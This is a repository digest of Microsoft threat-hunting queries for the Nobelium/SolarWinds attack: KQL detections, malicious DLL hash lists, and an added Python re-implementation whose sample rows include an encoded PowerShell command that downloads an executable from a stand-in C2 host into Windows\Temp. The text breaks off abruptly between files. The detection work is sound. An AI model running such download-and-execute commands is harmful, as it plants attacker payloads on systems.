// Decode; -EncodedCommand payloads are UTF-16LE, so drop the NUL bytes to get readable text
| extend base64_decoded = replace_regex(make_string(base64_decode_toarray(base64_extracted)), @'\0', '')
// Keep only candidates that mix uppercase letters and digits; lowercase-only or digit-only tokens are dropped
| where notempty(base64_extracted) and base64_extracted matches regex '[A-Z]' and base64_extracted matches regex '[0-9]'
```
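The following is an added example, not code from this repository or from Microsoft: a Python re-implementation of the query's extraction, length fix-up, decoding and filtering steps, run over constructed `DeviceProcessEvents`-style rows so the behaviour can be checked offline. Column names follow the Advanced Hunting schema; the rows, device names, paths and command lines are made up for this example, and `encode_for_powershell` is a helper added here to build the `-EncodedCommand` argument the way PowerShell expects it.

```python
# Added example, not code from the repository or from Microsoft: a Python
# re-implementation of the hunting query's Base64 extraction, length fix-up,
# decoding and filtering, run over constructed DeviceProcessEvents-style rows.
# Column names follow the Advanced Hunting schema; the rows are made up.
import base64
import re

# Same candidate pattern as the KQL extract(): a run of 20+ Base64 characters
# plus optional '=' padding (the query allows three; real Base64 uses at most two).
B64_CANDIDATE = re.compile(r"([A-Za-z0-9+/]{20,}={0,3})")
PARENT_PROCESS = "solarwinds.businesslayerhost.exe"  # KQL =~ is case-insensitive


def extract_base64(command_line: str) -> str:
    """KQL: extract(...) then substring() down to a multiple of four characters."""
    match = B64_CANDIDATE.search(command_line)
    if not match:
        return ""
    candidate = match.group(1)
    return candidate[: (len(candidate) // 4) * 4]


def decode_base64(candidate: str) -> str:
    """KQL: make_string(base64_decode_toarray(...)) with NUL bytes removed.

    -EncodedCommand takes Base64 of UTF-16LE text, so an ASCII command decodes
    to its characters interleaved with 0x00 bytes; dropping the NULs is what
    the query's replace(@'\\0', '', ...) step does."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return ""
    return "".join(chr(b) for b in raw if b != 0)


def looks_like_encoded_command(candidate: str) -> bool:
    """KQL: notempty() and matches regex '[A-Z]' and matches regex '[0-9]'.

    Real encoded commands mix cases and digits; a long lowercase-only word or
    a digit-only token also matches the Base64 class and is rejected here."""
    return (bool(candidate)
            and re.search(r"[A-Z]", candidate) is not None
            and re.search(r"[0-9]", candidate) is not None)


def hunt(events):
    """Apply the query's filters; return the rows it would surface, with the
    base64_extracted and base64_decoded columns the query adds."""
    hits = []
    for event in events:
        if event["InitiatingProcessFileName"].lower() != PARENT_PROCESS:
            continue
        if event["FileName"].lower() != "powershell.exe":
            continue
        candidate = extract_base64(event["ProcessCommandLine"])
        if not looks_like_encoded_command(candidate):
            continue
        hits.append({**event, "base64_extracted": candidate,
                     "base64_decoded": decode_base64(candidate)})
    return hits


def encode_for_powershell(command: str) -> str:
    """Build the argument -EncodedCommand expects: Base64 of the UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample rows (hypothetical device names, hosts and paths).
ATTACKER_COMMAND = ("Invoke-WebRequest http://c2.example.invalid/p "
                    "-OutFile C:\\Windows\\Temp\\p.exe")
SAMPLE_EVENTS = [
    # The pattern the query is written for: encoded PowerShell from the Orion host.
    {"DeviceName": "orion01", "InitiatingProcessFileName": "SolarWinds.BusinessLayerHost.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoP -NonI -W Hidden -EncodedCommand "
                           + encode_for_powershell(ATTACKER_COMMAND)},
    # Same parent, plain script invocation: no 20-character Base64 run at all.
    {"DeviceName": "orion01", "InitiatingProcessFileName": "SolarWinds.BusinessLayerHost.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Collect.ps1"},
    # Encoded command, but a different parent: outside the query's scope.
    {"DeviceName": "ws07", "InitiatingProcessFileName": "explorer.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -EncodedCommand " + encode_for_powershell(ATTACKER_COMMAND)},
    # A long lowercase hex token: matches the character class, fails the uppercase check.
    {"DeviceName": "orion01", "InitiatingProcessFileName": "SolarWinds.BusinessLayerHost.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -Command Get-FileHash -Algorithm SHA1 -Path deadbeefdeadbeefdeadbeef0123"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["DeviceName"], "->", hit["base64_decoded"])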
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/launching-cmd-echo[Nobelium].md
================================================
# Locate SolarWinds processes launching command prompt with the echo command
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query finds events in which `SolarWinds.BusinessLayerHost.exe` launched the [cmd.exe](https://docs.microsoft.com/windows-server/administration/windows-commands/cmd) command prompt with a command line containing the term `echo`. Using `echo` in this way is suspicious, as it is an indirect way of issuing commands, and may not be readily detected by certain kinds of security solutions. Because the query uses the `has` operator, `echo` must appear as a whole term (matched case-insensitively), so `cmd /c echo ...` matches while an unrelated token such as `echoserver` does not; switch to `contains` only if substring matching is wanted at the cost of more noise.
More Nobelium-related queries are listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceProcessEvents
// Parent is the Orion host process in which the trojanized DLL runs; =~ is case-insensitive
| where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe"
// 'has' matches echo as a whole term, so "cmd /c echo ..." is hit but a token like "echoserver" is not
| where FileName =~ "cmd.exe" and ProcessCommandLine has "echo"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/locate-dll-created-locally[Nobelium].md
================================================
# Locate Nobelium-related malicious DLLs created in the system or locally
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query locates files written to a device whose SHA-1 or SHA-256 hash matches a known Nobelium-related malicious DLL. `DeviceFileEvents` records file creation, modification, renaming and deletion, so a match on any of those action types is returned. Hash matching finds only the exact samples listed; a recompiled or otherwise modified DLL would not match, so pair this query with the loaded-in-memory and behavioural queries linked below.
More Nobelium-related queries are listed under the [See also](#see-also) section of this document.
## Query
```kusto
// Known Nobelium-related malicious DLL hashes
let nobelium_sha1 = dynamic([
    "76640508b1e7759e548771a5359eaed353bf1eec",
    "d130bd75645c2433f88ac03e73395fba172ef676",
    "1acf3108bf1e376c8848fbb25dc87424f2c2a39c",
    "e257236206e99f5a5c62035c9c59c57206728b28",
    "6fdd82b7ca1c1f0ec67c05b36d14c9517065353b",
    "2f1a5a7411d015d01aaee4535835400191645023",
    "bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387",
    "16505d0b929d80ad1680f993c02954cfd3772207",
    "d8938528d68aabe1e31df485eb3f75c8a925b5d9",
    "395da6d4f3c890295f7584132ea73d759bd9d094",
    "c8b7f28230ea8fbf441c64fdd3feeba88607069e",
    "2841391dfbffa02341333dd34f5298071730366a",
    "2546b0e82aecfe987c318c7ad1d00f9fa11cd305",
    "2dafddbfb0981c5aa31f27a298b9c804e553c7bc",
    "e2152737bed988c0939c900037890d1244d9a30e",
    "fd15760abfc0b2537b89adc65b1ff3f072e7e31c"
]);
let nobelium_sha256 = dynamic([
    "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77",
    "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6",
    "dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b",
    "eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed",
    "ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c",
    "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134",
    "c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77",
    "0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589",
    "e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d",
    "20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9",
    "2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d",
    "a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d",
    "92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690",
    "a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2",
    "b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666",
    "cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6",
    "ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8"
]);
DeviceFileEvents
| where SHA1 in (nobelium_sha1) or SHA256 in (nobelium_sha256)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | v | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/locate-dll-loaded-in-memory[Nobelium].md
================================================
# Locate Nobelium-related malicious DLLs loaded in memory
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
│ ├── Antivirus detections.txt
│ ├── ExploitGuardASRStats.txt
│ ├── ExploitGuardAsrDescriptions.txt
│ ├── ExploitGuardBlockOfficeChildProcess.txt
│ ├── ExploitGuardControlledFolderAccess.txt
│ ├── ExploitGuardNetworkProtectionEvents.txt
│ ├── ExploitGuardStats.txt
│ ├── PUA ThreatName per Computer.txt
│ ├── README.md
│ ├── SmartScreen URL block ignored by user.txt
│ ├── SmartScreen app block ignored by user.txt
│ ├── Windows filtering events (Firewall).txt
│ └── WindowsDefenderAVEvents.txt
├── README.md
├── Ransomware/
│ ├── Backup deletion.md
│ ├── Check for multiple signs of ransomware activity.md
│ ├── Clearing of forensic evidence from event logs using wevtutil.md
│ ├── DarkSide.md
│ ├── Deletion of data on multiple drives using cipher exe.md
│ ├── Discovery for highly-privileged accounts.md
│ ├── Distribution from remote location.md
│ ├── Fake Replies.md
│ ├── File Backup Deletion Alerts.md
│ ├── Gootkit File Delivery.md
│ ├── HTA Startup Persistence.md
│ ├── IcedId Delivery.md
│ ├── IcedId attachments.md
│ ├── IcedId email delivery.md
│ ├── LaZagne Credential Theft.md
│ ├── Potential ransomware activity related to Cobalt Strike.md
│ ├── Qakbot discovery activies.md
│ ├── Sticky Keys.md
│ ├── Stopping multiple processes using taskkill.md
│ ├── Stopping processes using net stop.md
│ ├── Suspicious Bitlocker Encryption.md
│ ├── Suspicious Google Doc Links.md
│ ├── Suspicious Image Load related to IcedId.md
│ ├── Turning off System Restore.md
│ └── Turning off services using sc exe.md
├── SECURITY.md
├── TVM/
│ └── devices_with_vuln_and_users_received_payload.md
├── Troubleshooting/
│ ├── Connectivity Failures by Device.md
│ └── Connectivity Failures by Domain.md
└── Webcasts/
├── Airlift 2021 - Lets Invoke.csl
├── Ignite 2020 - Best practices for hunting across domains with Microsoft 365 Defender.txt
├── README.md
├── TrackingTheAdversary/
│ ├── Episode 1 - KQL Fundamentals.txt
│ ├── Episode 2 - Joins.txt
│ ├── Episode 3 - Summarizing, Pivoting, and Joining.txt
│ ├── Episode 4 - Lets Hunt.txt
│ └── README.md
└── l33tSpeak/
├── MCAS - The Hunt.txt
├── Performance, Json and dynamics operator, external data.txt
└── l33tspeak 11 Oct 2021 - externaldata and query partitioning.csl
Condensed preview: 386 files, each showing path, character count, and a content snippet.
[
{
"path": ".gitignore",
"chars": 4832,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
},
{
"path": "00-query-submission-template.md",
"chars": 981,
"preview": "# < Insert query name >\n< Provide query description and usage tips >\n## Query\n```\n< Insert query string here >\n```\n## Ca"
},
{
"path": "CODE_OF_CONDUCT.md",
"chars": 444,
"preview": "# Microsoft Open Source Code of Conduct\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://op"
},
{
"path": "Campaigns/APT Baby Shark.txt",
"chars": 468,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml\n// Questions via Twitte"
},
{
"path": "Campaigns/APT29 thinktanks.txt",
"chars": 278,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml\n// Questions via"
},
{
"path": "Campaigns/Abuse.ch Recent Threat Feed.md",
"chars": 3301,
"preview": "# Abuse.ch Recent Threat Feed\n\nThis query will hunt for files matching the current abuse.ch recent threat feed based on "
},
{
"path": "Campaigns/Abusing settingcontent-ms.txt",
"chars": 761,
"preview": "// Sample query that search for .settingcontent-ms that has been downloaded from the web\n// through Microsoft Edge, Inte"
},
{
"path": "Campaigns/Bazacall/Bazacall Emails.md",
"chars": 1755,
"preview": "# Bazacall emails\nBazacall malware uses emails that contain a phone number for the user to call in order to cancel a fak"
},
{
"path": "Campaigns/Bazacall/Cobalt Strike Lateral Movement.md",
"chars": 1409,
"preview": "# Bazacall Cobalt Strike Lateral Movement\nMicrosoft has observed Bazacall using Cobalt Strike in order to move laterally"
},
{
"path": "Campaigns/Bazacall/Dropping payload via certutil.md",
"chars": 1461,
"preview": "# BazaCall dropping payload via certutil.exe\n\nBazaCall is a campaign that manipulate users into calling a customer suppo"
},
{
"path": "Campaigns/Bazacall/Excel Macro Execution.md",
"chars": 1109,
"preview": "# Bazacall Excel Macro Execution\nBazacall uses malicious macro-enabled Excel documents to execute their payload. \n\n## Qu"
},
{
"path": "Campaigns/Bazacall/Excel file download domain pattern.md",
"chars": 1344,
"preview": "# BazaCall Excel file download domain pattern\n\nBazaCall is a campaign that manipulate users into calling a customer supp"
},
{
"path": "Campaigns/Bazacall/Malicious Excel Delivery.md",
"chars": 1185,
"preview": "# Bazacall Malicious Excel Delivery\nBazacall uses malicious Excel files to execute payloads on affected devices. \n\n## Qu"
},
{
"path": "Campaigns/Bazacall/NTDS theft.md",
"chars": 1291,
"preview": "# Bazacall NTDS.dit Theft\nMicrosoft has observed compromises related to Bazacall resulting in theft of the Active Direct"
},
{
"path": "Campaigns/Bazacall/Renamed Rclone Exfil.md",
"chars": 1096,
"preview": "# Bazacall Renamed Rclone for Exfiltration\nMicrosoft has observed Bazacall using a renamed version of Rclone for data ex"
},
{
"path": "Campaigns/Bazacall/RunDLL Suspicious Network Connection.md",
"chars": 1428,
"preview": "# RunDLL Suspicious Network Connections\nDuring the chain of events from Bazacall to Bazaloader, RunDLL makes several net"
},
{
"path": "Campaigns/Bazarloader/Stolen Images Execution.md",
"chars": 1244,
"preview": "# Stolen Images\nThe \"Stolen Images\" Bazarloader campaign uses fake copyright infingement contact form emails and malicio"
},
{
"path": "Campaigns/Bazarloader/Zip-Doc - Creation of JPG Payload File.md",
"chars": 1375,
"preview": "# Zip-Doc - Creation of JPG Payload File\nIn the campaign where Bazarloader is delivered via emails containing pw protect"
},
{
"path": "Campaigns/Bazarloader/Zip-Doc - Word Launching MSHTA.md",
"chars": 1231,
"preview": "# Zip-Doc - Word Launching MSHTA\nThe pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Wor"
},
{
"path": "Campaigns/Bear Activity GTR 2019.txt",
"chars": 407,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml\n// Questions "
},
{
"path": "Campaigns/Cloud Hopper.txt",
"chars": 297,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml\n// Questions via Twit"
},
{
"path": "Campaigns/DofoilNameCoinServerTraffic.txt",
"chars": 812,
"preview": "// This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers\r\n// The full article is"
},
{
"path": "Campaigns/Dopplepaymer In-Memory Malware Implant.txt",
"chars": 455,
"preview": "///////////////////////////////////////////////////////////////////\n// Dopplepaymer In-Memory Malware Implant\n//\n// This"
},
{
"path": "Campaigns/Dragon Fly.txt",
"chars": 257,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml\n// Questions via Twitte"
},
{
"path": "Campaigns/Elise backdoor.txt",
"chars": 432,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml\n// Questions via Twitter: @"
},
{
"path": "Campaigns/Equation Group C2 Communication.txt",
"chars": 366,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml\n// Questions via"
},
{
"path": "Campaigns/Hurricane Panda activity.txt",
"chars": 345,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml\n// Questions via "
},
{
"path": "Campaigns/Judgement Panda exfil activity.txt",
"chars": 697,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml\n// Question"
},
{
"path": "Campaigns/Jupyter-Solarmaker/deimos-component-execution.md",
"chars": 1823,
"preview": "# Jupyter AKA SolarMarker\nJupyter, otherwise known as SolarMarker, is a malware family and cluster of components known f"
},
{
"path": "Campaigns/Jupyter-Solarmaker/evasive-powershell-executions.md",
"chars": 1794,
"preview": "# Jupyter AKA SolarMarker\nJupyter, otherwise known as SolarMarker, is a malware family and cluster of components known f"
},
{
"path": "Campaigns/Jupyter-Solarmaker/evasive-powershell-strings.md",
"chars": 1330,
"preview": "# Evasive PowerShell with uncommon read strings \n\nThis query searches for a string pattern detected in evasive PowerShel"
},
{
